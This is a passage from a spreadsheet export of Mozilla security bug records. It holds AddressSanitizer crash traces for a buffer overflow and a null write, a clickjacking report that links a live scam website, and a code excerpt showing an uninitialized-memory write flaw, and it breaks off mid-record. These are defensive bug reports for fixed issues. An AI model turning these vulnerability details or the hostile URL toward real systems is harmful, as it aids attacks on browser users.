    #2 0x7fd2615eb37f in nsFilterInstance::GetPreFilterNeededArea(nsIFrame*, nsRegion const&amp;) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:114:18
    #3 0x7fd2616225ae in nsSVGIntegrationUtils::GetRequiredSourceForInvalidArea(nsIFrame*, nsRect const&amp;) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:354:10
    #4 0x7fd2612926cb in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayList*) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:2448:7
    #5 0x7fd26110ba2c in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3598:15
    #6 0x7fd26162a025 in PaintFrameCallback::operator()(gfxContext*, gfxRect const&amp;, mozilla::gfx::SamplingFilter, gfxMatrix const&amp;) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1200:3
    #7 0x7fd25ca35358 in gfxCallbackDrawable::Draw(gfxContext*, gfxRect const&amp;, mozilla::gfx::ExtendMode, mozilla::gfx::SamplingFilter, double, gfxMatrix const&amp;) /home/worker/workspace/build/src/gfx/thebes/gfxDrawable.cpp:172:16
    #8 0x7fd25ca34c26 in gfxCallbackDrawable::MakeSurfaceDrawable(mozilla::gfx::SamplingFilter) /home/worker/workspace/build/src/gfx/thebes/gfxDrawable.cpp:129:5
    #9 0x7fd25ca351a5 in gfxCallbackDrawable::Draw(gfxContext*, gfxRect const&amp;, mozilla::gfx::ExtendMode, mozilla::gfx::SamplingFilter, double, gfxMatrix const&amp;) /home/worker/workspace/build/src/gfx/thebes/gfxDrawable.cpp:163:28
    #10 0x7fd25cbae754 in gfxUtils::DrawPixelSnapped(gfxContext*, gfxDrawable*, gfxSize const&amp;, mozilla::image::ImageRegion const&amp;, mozilla::gfx::SurfaceFormat, mozilla::gfx::SamplingFilter, unsigned int, double) /home/worker/workspace/build/src/gfx/thebes/gfxUtils.cpp:584:15
    #11 0x7fd25cc30e40 in mozilla::image::DynamicImage::Draw(gfxContext*, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::image::ImageRegion const&amp;, unsigned int, mozilla::gfx::SamplingFilter, mozilla::Maybe&lt;mozilla::SVGImageContext&gt; const&amp;, unsigned int, float) /home/worker/workspace/build/src/image/DynamicImage.cpp:238:5
    #12 0x7fd2611226da in DrawImageInternal(gfxContext&amp;, nsPresContext*, imgIContainer*, mozilla::gfx::SamplingFilter, nsRect const&amp;, nsRect const&amp;, nsPoint const&amp;, nsRect const&amp;, mozilla::Maybe&lt;mozilla::SVGImageContext&gt; const&amp;, unsigned int, mozilla::gfx::ExtendMode, float) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:6692:22
    #13 0x7fd26112685b in nsLayoutUtils::DrawImage(gfxContext&amp;, nsPresContext*, imgIContainer*, mozilla::gfx::SamplingFilter, nsRect const&amp;, nsRect const&amp;, nsPoint const&amp;, nsRect const&amp;, unsigned int, float) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:6925:10
    #14 0x7fd261971480 in mozilla::nsImageRenderer::Draw(nsPresContext*, nsRenderingContext&amp;, nsRect const&amp;, nsRect const&amp;, nsRect const&amp;, nsPoint const&amp;, nsSize const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::CSSPixel&gt; const&amp;, float) /home/worker/workspace/build/src/layout/painting/nsImageRenderer.cpp:544:9
    #15 0x7fd2618c158b in mozilla::nsImageRenderer::DrawLayer(nsPresContext*, nsRenderingContext&amp;, nsRect const&amp;, nsRect const&amp;, nsPoint const&amp;, nsRect const&amp;, nsSize const&amp;, float) /home/worker/workspace/build/src/layout/painting/nsImageRenderer.cpp:706:10
    #16 0x7fd2618b927d in nsCSSRendering::PaintStyleImageLayerWithSC(nsCSSRendering::PaintBGParams const&amp;, nsRenderingContext&amp;, nsStyleContext*, nsStyleBorder const&amp;) /home/worker/workspace/build/src/layout/painting/nsCSSRendering.cpp:2721:30
    #17 0x7fd2618b72e9 in nsCSSRendering::PaintStyleImageLayer(nsCSSRendering::PaintBGParams const&amp;, nsRenderingContext&amp;) /home/worker/workspace/build/src/layout/painting/nsCSSRendering.cpp:1943:10
    #18 0x7fd261927229 in nsDisplayBackgroundImage::PaintInternal(nsDisplayListBuilder*, nsRenderingContext*, nsRect const&amp;, nsRect*) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:3689:5
    #19 0x7fd26123d158 in nsDisplayCanvasBackgroundImage::Paint(nsDisplayListBuilder*, nsRenderingContext*) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:390:3
    #20 0x7fd26189a639 in mozilla::FrameLayerBuilder::PaintItems(nsTArray&lt;mozilla::FrameLayerBuilder::ClippedDisplayItem&gt;&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6036:21
    #21 0x7fd26189d114 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6211:19
    #22 0x7fd25c8199da in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray&lt;mozilla::layers::ReadbackProcessor::Update&gt;*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:86:5
    #23 0x7fd25c81a656 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:140:3
    #24 0x7fd25c84b66f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29
    #25 0x7fd25c815096 in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:375:13
    #26 0x7fd25c815907 in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:433:3
    #27 0x7fd261910f47 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2292:17
    #28 0x7fd26110ca1e in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3721:12
    #29 0x7fd2610127f6 in mozilla::PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6498:5
    #30 0x7fd2608729b2 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:481:19
    #31 0x7fd260871915 in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:413:33
    #32 0x7fd2608752b5 in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1095:5
    #33 0x7fd260f735a8 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1985:11
    #34 0x7fd260f7e973 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:300:7
    #35 0x7fd260f7e644 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:322:5
    #36 0x7fd260f80cfb in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:753:5
    #37 0x7fd260f80cfb in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:666
    #38 0x7fd260f808a5 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:567:9
    #39 0x7fd2617a4542 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16
    #40 0x7fd25ba765e9 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #41 0x7fd25b7349a4 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1630:28
    #42 0x7fd25b68cf64 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2040:25
    #43 0x7fd25b689df7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1975:17
    #44 0x7fd25b68bb04 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1844:5
    #45 0x7fd25b68c136 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1877:15
    #46 0x7fd25a8ef8a0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1270:14
    #47 0x7fd25a8ec2e8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:393:10
    #48 0x7fd25b694f21 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #49 0x7fd25b5f3c50 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #50 0x7fd25b5f3c50 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #51 0x7fd25b5f3c50 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #52 0x7fd2608eda8f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #53 0x7fd264139fb7 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #54 0x7fd25b5f3c50 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #55 0x7fd25b5f3c50 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #56 0x7fd25b5f3c50 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #57 0x7fd264139ae5 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:709:34
    #58 0x4eb7a3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #59 0x4eb7a3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:285
    #60 0x7fd27633082f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #61 0x41d0f8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d0f8)
0x7fd26840d038 is located 0 bytes to the right of global variable 'vtable for SVGFEContainerFrame' defined in '/home/worker/workspace/build/src/obj-firefox/layout/svg/Unified_cpp_layout_svg0.cpp' (0x7fd26840cba0) of size 1176
SUMMARY: AddressSanitizer: global-buffer-overflow /home/worker/workspace/build/src/layout/svg/SVGGeometryFrame.cpp:701:52 in mozilla::SVGGeometryFrame::GetCanvasTM()
Shadow bytes around the buggy address:
  0x0ffacd0799b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffacd0799c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffacd0799d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffacd0799e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffacd0799f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0ffacd079a00: 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 f9
  0x0ffacd079a10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0ffacd079a20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0ffacd079a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffacd079a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffacd079a5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8350==ABORTING
[Parent 27963] WARNING: pipe error (57): Connection reset by peer: file /home/worker/workspace/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 353
[Parent 27963] WARNING: pipe error (53): Connection reset by peer: file /home/worker/workspace/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 353
###!!! [Parent][MessageChannel] Error: (msgtype=0x2C0081,name=PBrowser::Msg_Destroy) Channel error: cannot send/recv
ASAN:DEADLYSIGNAL
=================================================================
==28371==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f4597a8f767 bp 0x7f4593c62380 sp 0x7f4593c62370 T2)
==28371==The signal is caused by a WRITE memory access.
==28371==Hint: address points to the zero page.
    #0 0x7f4597a8f766 in mozilla::ipc::MessageChannel::OnChannelErrorFromLink() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2465:13
    #1 0x7f4597a948b7 in OnChannelError /home/worker/workspace/build/src/ipc/glue/MessageLink.cpp:368:12
    #2 0x7f4597a948b7 in non-virtual thunk to mozilla::ipc::ProcessLink::OnChannelError() /home/worker/workspace/build/src/ipc/glue/MessageLink.cpp:360
    #3 0x7f4597a40c71 in event_persist_closure /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1580:9
    #4 0x7f4597a40c71 in event_process_active_single_queue /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1639
    #5 0x7f4597a383d9 in event_process_active /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1741:9
    #6 0x7f4597a383d9 in event_base_loop /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1961
    #7 0x7f45979f8acd in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/chromium/src/base/message_pump_libevent.cc:373:7
    #8 0x7f45979f3c50 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #9 0x7f45979f3c50 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #10 0x7f45979f3c50 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #11 0x7f4597a11e3f in base::Thread::ThreadMain() /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:179:16
    #12 0x7f4597a0129c in ThreadFunc(void*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:38:13
    #13 0x7f45b37846b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
    #14 0x7f45b280d82c in clone /build/glibc-9tT8Do/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2465:13 in mozilla::ipc::MessageChannel::OnChannelErrorFromLink()
Thread T2 (Chrome_ChildThr) created by T0 (Web Content) here:
    #0 0x4a3d56 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:245:3
    #1 0x7f4597a001ec in CreateThread /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:139:14
    #2 0x7f4597a001ec in PlatformThread::Create(unsigned long, PlatformThread::Delegate*, unsigned long*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:150
    #3 0x7f4597a1187e in base::Thread::StartWithOptions(base::Thread::Options const&amp;) /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:98:8
    #4 0x7f4597a968d7 in mozilla::ipc::ProcessChild::ProcessChild(int) /home/worker/workspace/build/src/ipc/glue/ProcessChild.cpp:24:5
    #5 0x7f45a0539a42 in ContentProcess /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/ContentProcess.h:31:7
    #6 0x7f45a0539a42 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:654
    #7 0x4eb7a3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #8 0x4eb7a3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:285
    #9 0x7f45b272782f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
==28371==ABORTING</t>
        </is>
      </c>
      <c r="X436" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="437">
      <c r="A437" t="n">
        <v>1445844</v>
      </c>
      <c r="B437" t="inlineStr">
        <is>
          <t>2018-03-14 19:07:19 -0700</t>
        </is>
      </c>
      <c r="C437" t="inlineStr">
        <is>
          <t>Custom cursor goes outside the bounds of the web content in "malware" website</t>
        </is>
      </c>
      <c r="D437" t="inlineStr">
        <is>
          <t>2023-11-15 16:06:00 -0800</t>
        </is>
      </c>
      <c r="E437" t="n">
        <v>1</v>
      </c>
      <c r="F437" t="n">
        <v>1</v>
      </c>
      <c r="G437" t="n">
        <v>3</v>
      </c>
      <c r="H437" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I437" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J437" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K437" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L437" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M437" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N437" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O437" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P437" t="inlineStr">
        <is>
          <t>[adv-main67+]</t>
        </is>
      </c>
      <c r="Q437" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R437" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S437" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T437" t="n">
        <v>1</v>
      </c>
      <c r="U437" t="n">
        <v>2</v>
      </c>
      <c r="V437" t="n">
        <v>51</v>
      </c>
      <c r="W437" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180206200532
Steps to reproduce:
1) Navigate to https://twomastersmedia.com/iops/?c5aa9d589430490ftfn1d5aa9d58943083=(888)%20498-4480# (note this is a website that tries to capture all events, so it's hard to get out of it)
2) Move the cursor around in the area with the red background
3) Move the cursor to the Firefox's top bar buttons (Home button / Hamburger Menu, etc) or Address bar.  Click the mouse.
Special note: keep slowly moving the mouse cursor upward toward the top of the screen, it will "go off the top" and then appear again slightly below the top bar.  That's the "real cursor" and all clicks are registered by that.
Actual results:
Nothing happens, it appears the click is not registered.  Note that if you click and drag downward a bit, it highlights some text on the webpage itself!
Expected results:
The click should have been received by Firefox.
Note: it appears to be caused by a fake cursor - shouldn't Firefox prevent that somehow?</t>
        </is>
      </c>
      <c r="X437" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="438">
      <c r="A438" t="n">
        <v>1167356</v>
      </c>
      <c r="B438" t="inlineStr">
        <is>
          <t>2015-05-21 13:07:38 -0700</t>
        </is>
      </c>
      <c r="C438" t="inlineStr">
        <is>
          <t>YCbCrImageDataDeserializer::ToDataSourceSurface using uninitialized memory</t>
        </is>
      </c>
      <c r="D438" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:22 -0700</t>
        </is>
      </c>
      <c r="E438" t="n">
        <v>1</v>
      </c>
      <c r="F438" t="n">
        <v>1</v>
      </c>
      <c r="G438" t="n">
        <v>3</v>
      </c>
      <c r="H438" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I438" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J438" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K438" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L438" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M438" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N438" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O438" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P438" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+][adv-esr31.8+]</t>
        </is>
      </c>
      <c r="Q438" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R438" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S438" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T438" t="n">
        <v>1</v>
      </c>
      <c r="U438" t="n">
        <v>0</v>
      </c>
      <c r="V438" t="n">
        <v>47</v>
      </c>
      <c r="W438" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows; rv:26.0) Gecko/20100101 Firefox/26.0
Build ID: 20150305021524
Steps to reproduce:
In Firefox 38.0.1, YCbCrImageDataDeserializer::ToDataSourceSurface uses uninitialized memory at gfx\layers\YCbCrImageDataSerializer.cpp line 292 et seq.
The problem is that YCbCrImageDataDeserializer::ToDataSourceSurface does not check the return value from DataSourceSurface::Map at line 290, thus (on failure and for some derived classes of DataSourceSurface, e.g., DataSourceSurfaceD2D) leaving untouched whatever was contained in the uninitialized variable map:
  DataSourceSurface::MappedSurface map;
  result-&gt;Map(DataSourceSurface::MapType::WRITE, &amp;map);
  gfx::ConvertYCbCrToRGB32(GetYData(), GetCbData(), GetCrData(),
                           map.mData,
                           0, 0, //pic x and y
                           GetYSize().width, GetYSize().height,
                           GetYStride(), GetCbCrStride(),
                           map.mStride,
                           gfx::YV12);
  result-&gt;Unmap();
Since map can contain anything, this bug could make it possible to write data into anywhere in Firefox's address space. Depending on how ToDataSourceSurface is used, this bug might be exploitable to disclose sensitive data and/or cause execution of attacker-selected code.</t>
        </is>
      </c>
      <c r="X438" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="439">
      <c r="A439" t="n">
        <v>1022773</v>
      </c>
      <c r="B439" t="inlineStr">
        <is>
          <t>2014-06-09 10:15:46 -0700</t>
        </is>
      </c>
      <c r="C439" t="inlineStr">
        <is>
          <t>Static hazard analysis does not detect a return value held live across a GC</t>
        </is>
      </c>
      <c r="D439" t="inlineStr">
        <is>
          <t>2016-06-04 16:00:57 -0700</t>
        </is>
      </c>
      <c r="E439" t="n">
        <v>1</v>
      </c>
      <c r="F439" t="n">
        <v>1</v>
      </c>
      <c r="G439" t="n">
        <v>3</v>
      </c>
      <c r="H439" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I439" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J439" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K439" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L439" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M439" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N439" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O439" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P439" t="inlineStr">
        <is>
          <t>[qa-][adv-main31+]</t>
        </is>
      </c>
      <c r="Q439" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R439" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S439" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T439" t="n">
        <v>1</v>
      </c>
      <c r="U439" t="n">
        <v>0</v>
      </c>
      <c r="V439" t="n">
        <v>48</v>
      </c>
      <c r="W439" t="inlineStr">
        <is>
          <t>bz found a real live hazard in the wild that the analysis should catch but does not. See bug 1009675.
Consider:
Value foo() {
	CallSetup s;
	return bar();
}
where CallSetup::~CallSetup can gc. The relevant bit of the CFG is:
pentry: 1
pexit:  14
Call(11,12, __temp_3 := this*.Call(__temp_4*,__temp_5*,__temp_6*,aRv*))
Assign(12,13, return := __temp_3*)
Call(13,14, s.~CallSetup())
The problem is that __temp_3 gets stored into a magical 'return' variable, which is never considered to be used, and only then does ~CallSetup get invoked. Given that we always have a single unique exit point (14, here), it seems like I should be able to just say that the exit point implicitly uses 'return'. (Or at least, I'm assuming from the existence of a 'pexit' field that there's always a single unique exit point.)</t>
        </is>
      </c>
      <c r="X439" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="440">
      <c r="A440" t="n">
        <v>641456</v>
      </c>
      <c r="B440" t="inlineStr">
        <is>
          <t>2011-03-14 03:49:30 -0700</t>
        </is>
      </c>
      <c r="C440" t="inlineStr">
        <is>
          <t>Add Thunderbird 3.3 Alpha 3 to bouncer</t>
        </is>
      </c>
      <c r="D440" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E440" t="n">
        <v>1</v>
      </c>
      <c r="F440" t="n">
        <v>1</v>
      </c>
      <c r="G440" t="n">
        <v>5</v>
      </c>
      <c r="H440" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I440" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J440" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K440" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L440" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M440" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N440" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O440" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P440" t="inlineStr"/>
      <c r="Q440" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R440" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S440" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T440" t="n">
        <v>1</v>
      </c>
      <c r="U440" t="n">
        <v>0</v>
      </c>
      <c r="V440" t="n">
        <v>2</v>
      </c>
      <c r="W440" t="inlineStr">
        <is>
          <t>The Thunderbird team is going to release Thunderbird 3.3 Alpha 3 on 15th or 16th March 2011, and we'd like to have the main builds added to bouncer for downloads.
The relevant URLs to add are (bouncer and FTP):
Thunderbird-3.3a3                     osx     /thunderbird/releases/3.3a3/mac/:lang/Miramar%203.3%20Alpha%203.dmg
